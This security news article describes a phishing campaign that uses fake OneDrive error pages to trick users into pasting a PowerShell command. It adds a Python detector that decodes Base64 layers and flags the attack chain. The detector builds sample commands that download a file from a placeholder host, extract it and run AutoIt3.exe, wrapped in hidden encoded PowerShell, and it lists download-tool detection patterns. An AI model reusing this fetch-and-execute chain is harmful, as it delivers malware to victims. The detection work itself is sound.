OneDrive Users Targeted in Sophisticated Phishing and Downloader Campaign
Microsoft OneDrive users are being targeted in a new and sophisticated phishing campaign that leverages social engineering to trick victims into executing malicious PowerShell scripts. Trellix Advanced Research Center has identified this campaign, which uses fake OneDrive error messages to lure users into downloading malware.
The attack begins with an email containing a malicious HTML file. Upon opening, the file displays a convincing OneDrive page with a fabricated error message. This message claims a DNS issue prevents access to a file and prompts the user to click on a “How to fix” button.
The “How to fix” button runs JavaScript embedded in the HTML file that silently copies a malicious command to the user’s clipboard. The page then walks the user through executing it: open the Quick Link menu (Windows Key + X), open the Windows PowerShell terminal, paste the command, and press Enter. The command, partially encoded in Base64, downloads and runs malware disguised as a legitimate file. In detail, it performs several actions:
- Flushes the DNS cache with `ipconfig /flushdns`, which lends credibility to the lure’s fabricated DNS error.
- Creates a folder named “downloads” on the C: drive.
- Downloads an archive file into this folder, renames it, extracts its contents, and executes the extracted script using AutoIt3.exe.
- Displays the message “The operation completed successfully, please reload the page.”
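Detection logic for the command chain described above, as an added example that is not code from Trellix or from the article: it takes the text of a PowerShell script block (the kind of content a Script Block Logging event, ID 4104, records), peels embedded Base64 layers in both the `FromBase64String` (UTF-8) and `-EncodedCommand` (UTF-16LE) forms, and then scores the indicators the article lists. The sample commands, the `example.invalid` hostname and the file names are constructed for this example and are not the campaign’s real artifacts.

```python
import base64
import re

# Constructed sample (NOT the campaign's real command): a second-stage PowerShell
# script mirroring the steps the article lists. Host and file names are placeholders.
INNER_STAGE = (
    "ipconfig /flushdns; "
    "New-Item -ItemType Directory -Path C:\\downloads -Force | Out-Null; "
    "Invoke-WebRequest -Uri http://example.invalid/update.txt -OutFile C:\\downloads\\update.txt; "
    "Rename-Item C:\\downloads\\update.txt C:\\downloads\\update.zip; "
    "Expand-Archive C:\\downloads\\update.zip -DestinationPath C:\\downloads; "
    "Start-Process C:\\downloads\\AutoIt3.exe -ArgumentList C:\\downloads\\script.a3x; "
    "Write-Host 'The operation completed successfully, please reload the page.'"
)


def build_fromb64_sample() -> str:
    """Outer command as a victim would paste it: the stage hides in a UTF-8 Base64
    string that is decoded and run in-process (constructed sample)."""
    b64 = base64.b64encode(INNER_STAGE.encode("utf-8")).decode("ascii")
    return ("Invoke-Expression ([System.Text.Encoding]::UTF8.GetString("
            f"[System.Convert]::FromBase64String('{b64}')))")


def build_encodedcommand_sample() -> str:
    """Same stage delivered via -EncodedCommand, which expects UTF-16LE Base64."""
    b64 = base64.b64encode(INNER_STAGE.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {b64}"


# Long runs of Base64 alphabet characters (with optional padding) are decode candidates.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# One regex per step of the chain the article describes.
INDICATORS = {
    "dns_flush": re.compile(r"ipconfig\s+/flushdns", re.I),
    "downloads_dir": re.compile(r"C:\\downloads\b", re.I),
    "web_download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|Start-BitsTransfer|\bcurl\b", re.I),
    "rename": re.compile(r"Rename-Item|Move-Item", re.I),
    "extract": re.compile(r"Expand-Archive|ExtractToDirectory", re.I),
    "autoit": re.compile(r"AutoIt3\.exe", re.I),
    "lure_message": re.compile(r"operation completed successfully.*reload the page", re.I),
}


def _mostly_text(s: str) -> bool:
    """True when a decoded buffer reads as text rather than binary noise."""
    if not s:
        return False
    ok = sum(1 for c in s if c.isprintable() or c in "\r\n\t")
    return ok / len(s) > 0.9


def decode_base64_fragments(text: str) -> list[str]:
    """Return every long Base64 token in `text` that decodes to readable text.
    UTF-16LE is tried first when the bytes show the interleaved NULs that
    -EncodedCommand payloads have; otherwise UTF-8 is assumed."""
    found = []
    for m in B64_TOKEN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        looks_utf16 = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
        for enc in (("utf-16-le", "utf-8") if looks_utf16 else ("utf-8",)):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _mostly_text(s):
                found.append(s)
                break
    return found


def analyze_script_block(block: str, max_depth: int = 3) -> dict:
    """Peel up to `max_depth` nested Base64 layers, then test every layer
    (outer text included) against the indicators. Returns hits, score, verdict."""
    layers, frontier = [block], [block]
    for _ in range(max_depth):
        frontier = [s for layer in frontier for s in decode_base64_fragments(layer)]
        if not frontier:
            break
        layers.extend(frontier)
    corpus = "\n".join(layers)
    hits = {name: bool(rx.search(corpus)) for name, rx in INDICATORS.items()}
    score = sum(hits.values())
    # A lone flushdns is routine admin activity; require the chain, not one step.
    verdict = "match" if score >= 4 and hits["autoit"] else "no match"
    return {"decoded_layers": len(layers) - 1, "hits": hits, "score": score, "verdict": verdict}


if __name__ == "__main__":
    for sample in (build_fromb64_sample(), build_encodedcommand_sample(), "ipconfig /flushdns"):
        r = analyze_script_block(sample)
        print(r["verdict"], r["score"], r["decoded_layers"], sample[:60])
```

Both constructed wrappers score the full chain only after decoding, which is why the outer text alone would never trigger a string match on `AutoIt3.exe` or `C:\downloads`; a lone `ipconfig /flushdns` scores one and is not flagged, since that command is normal troubleshooting. To use this on real data, feed it the script block text from PowerShell Operational log events (ID 4104), which requires Script Block Logging to be enabled on the endpoint.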
This campaign primarily exploits user trust and urgency through social engineering. The sophisticated use of HTML files, embedded JavaScript, and the simulation of legitimate error messages highlight the lengths to which attackers will go to deceive their victims.
Trellix has observed this campaign targeting OneDrive users globally. The potential impact on individuals and businesses is significant, as the malware can lead to data breaches, financial losses, and reputational damage.
By preying on users’ emotions and trust, attackers can gain a foothold even in well-defended environments, because the victim, not an exploit, runs the code. Enterprises must remain vigilant, continuously educating their workforce (in particular, never to paste a command from a web page into a terminal) and reinforcing technical controls such as PowerShell script block logging, so that executions of this kind are visible to defenders when training fails.